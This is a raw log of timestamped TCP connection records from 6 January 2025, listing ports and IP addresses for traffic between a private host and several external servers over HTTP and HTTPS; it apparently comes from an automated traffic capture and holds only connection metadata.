Jan 6, 2025 07:57:59.064780951 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064786911 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.064794064 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064805031 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064816952 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064821005 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.064841032 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064846039 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.064855099 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064865112 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064882994 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064889908 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.064899921 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064910889 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.064913034 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064925909 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064938068 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064950943 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064951897 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.064964056 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064965010 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.064976931 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.064996958 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.065022945 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.065284967 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065296888 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065308094 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065324068 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065335989 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.065363884 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.065757036 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065774918 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065787077 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065798044 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065809965 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065818071 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.065821886 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065834045 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065838099 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.065846920 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065859079 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065871000 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.065879107 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065891027 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065900087 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065906048 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.065921068 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065921068 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.065936089 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065941095 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.065948009 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065967083 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065977097 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.065979958 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.065992117 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066004992 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066015959 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066015959 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066037893 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066044092 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066051006 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066062927 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066066027 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066086054 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066093922 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066099882 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066111088 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066123962 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066134930 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066138029 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066147089 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066160917 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066173077 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066176891 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066176891 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066184998 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066198111 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066205025 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066210985 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066232920 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066236973 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066246033 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066256046 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066258907 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066278934 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066286087 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066293001 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066303015 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066317081 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066323996 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066329002 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066332102 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066343069 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066354990 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066365957 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066366911 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066380024 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066399097 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066402912 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066411018 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066423893 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066432953 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066437006 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066450119 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066457033 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066466093 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066478014 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066479921 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066490889 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066502094 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066514015 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066520929 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066546917 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066560984 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066617966 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066628933 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066648960 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066662073 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066668034 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066679955 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066708088 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066785097 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066795111 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066807985 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066821098 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.066833019 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.066845894 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.113919973 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:59.151187897 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:59.192919970 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:58:02.414609909 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:58:02.791326046 CET	49732	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:02.796179056 CET	80	49732	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:02.796262980 CET	49732	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:02.796468019 CET	49732	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:02.801218987 CET	80	49732	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:03.498809099 CET	80	49732	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:03.506364107 CET	49732	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:03.511389971 CET	80	49732	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:03.720361948 CET	80	49732	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:03.789102077 CET	49732	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:04.009082079 CET	49733	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:04.009130955 CET	443	49733	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:04.009205103 CET	49733	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:04.022093058 CET	49733	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:04.022114038 CET	443	49733	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:04.495255947 CET	443	49733	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:04.495419979 CET	49733	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:04.537383080 CET	49733	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:04.537405014 CET	443	49733	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:04.537714958 CET	443	49733	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:04.586036921 CET	49733	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:04.920145035 CET	49733	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:04.967327118 CET	443	49733	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:05.029717922 CET	443	49733	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:05.029766083 CET	443	49733	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:05.029829979 CET	49733	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:05.039176941 CET	49733	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:05.057239056 CET	49732	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:05.062117100 CET	80	49732	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:05.271744013 CET	80	49732	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:05.274842978 CET	49734	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:05.274900913 CET	443	49734	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:05.274976015 CET	49734	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:05.275234938 CET	49734	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:05.275245905 CET	443	49734	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:05.476677895 CET	49732	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:05.755295038 CET	443	49734	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:05.756932974 CET	49734	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:05.756963968 CET	443	49734	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:05.892373085 CET	443	49734	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:05.892436028 CET	443	49734	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:05.893073082 CET	49734	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:05.893379927 CET	49734	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:05.896404982 CET	49732	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:05.897325993 CET	49735	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:05.901441097 CET	80	49732	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:05.901531935 CET	49732	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:05.902256966 CET	80	49735	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:05.902900934 CET	49735	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:05.902997971 CET	49735	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:05.907826900 CET	80	49735	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:06.603653908 CET	80	49735	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:06.605031013 CET	49736	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:06.605086088 CET	443	49736	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:06.605166912 CET	49736	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:06.605479002 CET	49736	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:06.605494976 CET	443	49736	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:06.679742098 CET	49735	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:07.062342882 CET	443	49736	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:07.065099955 CET	49736	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:07.065144062 CET	443	49736	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:07.194870949 CET	443	49736	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:07.194936991 CET	443	49736	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:07.194983006 CET	49736	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:07.196150064 CET	49736	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:07.203073025 CET	49735	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:07.204687119 CET	49737	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:07.208019018 CET	80	49735	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:07.208076000 CET	49735	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:07.209547997 CET	80	49737	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:07.209618092 CET	49737	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:07.215384960 CET	49737	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:07.220360994 CET	80	49737	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:07.905874968 CET	80	49737	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:07.907286882 CET	49738	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:07.907355070 CET	443	49738	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:07.907437086 CET	49738	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:07.907699108 CET	49738	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:07.907716036 CET	443	49738	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:07.961019039 CET	49737	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:08.381822109 CET	443	49738	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:08.384001017 CET	49738	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:08.384049892 CET	443	49738	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:08.540865898 CET	443	49738	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:08.540931940 CET	443	49738	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:08.541024923 CET	49738	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:08.541549921 CET	49738	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:08.544488907 CET	49737	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:08.545605898 CET	49739	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:08.549477100 CET	80	49737	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:08.549570084 CET	49737	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:08.550474882 CET	80	49739	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:08.550559998 CET	49739	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:08.550697088 CET	49739	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:08.555506945 CET	80	49739	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:09.223630905 CET	80	49739	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:09.224792004 CET	49740	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:09.224854946 CET	443	49740	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:09.224929094 CET	49740	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:09.225191116 CET	49740	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:09.225205898 CET	443	49740	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:09.273654938 CET	49739	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:09.698873997 CET	443	49740	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:09.700711966 CET	49740	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:09.700742960 CET	443	49740	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:09.825339079 CET	443	49740	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:09.825417042 CET	443	49740	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:09.825476885 CET	49740	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:09.826016903 CET	49740	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:09.829586983 CET	49741	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:09.834512949 CET	80	49741	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:09.834604025 CET	49741	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:09.834676027 CET	49741	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:09.839560986 CET	80	49741	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:10.527867079 CET	80	49741	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:10.529293060 CET	49742	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:10.529355049 CET	443	49742	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:10.529434919 CET	49742	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:10.529686928 CET	49742	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:10.529700994 CET	443	49742	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:10.570391893 CET	49741	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:10.987618923 CET	443	49742	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:10.989706039 CET	49742	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:10.989741087 CET	443	49742	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:11.138319969 CET	443	49742	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:11.138379097 CET	443	49742	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:11.138422012 CET	49742	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:11.138847113 CET	49742	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:11.267925024 CET	49741	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:11.268541098 CET	49743	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:11.273000002 CET	80	49741	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:11.273066044 CET	49741	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:11.273341894 CET	80	49743	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:11.273396969 CET	49743	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:11.273552895 CET	49743	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:11.278337002 CET	80	49743	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:11.966157913 CET	80	49743	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:11.968208075 CET	49744	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:11.968249083 CET	443	49744	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:11.968298912 CET	49744	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:11.968523026 CET	49744	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:11.968532085 CET	443	49744	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:12.009115934 CET	49743	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:12.442714930 CET	443	49744	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:12.445060968 CET	49744	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:12.445096970 CET	443	49744	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:12.580528021 CET	443	49744	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:12.580590963 CET	443	49744	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:12.580708981 CET	49744	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:12.581022024 CET	49744	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:12.884625912 CET	49743	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:12.889969110 CET	80	49743	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:12.890124083 CET	49743	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:12.948481083 CET	49745	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:12.953385115 CET	80	49745	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:12.953454018 CET	49745	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:12.955374002 CET	49745	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:12.960232973 CET	80	49745	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:13.625932932 CET	80	49745	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:13.627060890 CET	49746	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:13.627160072 CET	443	49746	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:13.627230883 CET	49746	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:13.627521992 CET	49746	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:13.627554893 CET	443	49746	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:13.667103052 CET	49745	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:14.080952883 CET	443	49746	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:14.087605000 CET	49746	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:14.087635040 CET	443	49746	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:14.214307070 CET	443	49746	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:14.214380026 CET	443	49746	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:14.214432955 CET	49746	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:14.214777946 CET	49746	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:14.263854980 CET	49745	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:14.265814066 CET	49747	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:14.268958092 CET	80	49745	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:14.269006968 CET	49745	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:14.270700932 CET	80	49747	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:14.270762920 CET	49747	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:14.270870924 CET	49747	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:14.275672913 CET	80	49747	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:14.948498964 CET	80	49747	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:14.950403929 CET	49739	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:14.982726097 CET	49748	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:14.982767105 CET	443	49748	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:14.983026028 CET	49748	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:14.984548092 CET	49748	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:14.984570980 CET	443	49748	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:15.150167942 CET	49747	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:15.449980021 CET	443	49748	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:15.473259926 CET	49748	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:15.473300934 CET	443	49748	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:15.585122108 CET	443	49748	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:15.585182905 CET	443	49748	188.114.97.3	192.168.2.4
Jan 6, 2025 07:58:15.585230112 CET	49748	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:15.585685015 CET	49748	443	192.168.2.4	188.114.97.3
Jan 6, 2025 07:58:15.628171921 CET	49747	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:15.633289099 CET	80	49747	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:15.633343935 CET	49747	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:15.634195089 CET	49751	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:15.634243011 CET	443	49751	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:15.634304047 CET	49751	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:15.634886026 CET	49751	443	192.168.2.4	149.154.167.220
Jan 6, 2025 07:58:15.634897947 CET	443	49751	149.154.167.220	192.168.2.4
Jan 6, 2025 07:58:15.685067892 CET	49752	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:15.690155983 CET	80	49752	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:15.690216064 CET	49752	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:15.690438986 CET	49752	80	192.168.2.4	132.226.247.73
Jan 6, 2025 07:58:15.696516037 CET	80	49752	132.226.247.73	192.168.2.4
Jan 6, 2025 07:58:16.262887955 CET	443	49751	149.154.167.220	192.168.2.4
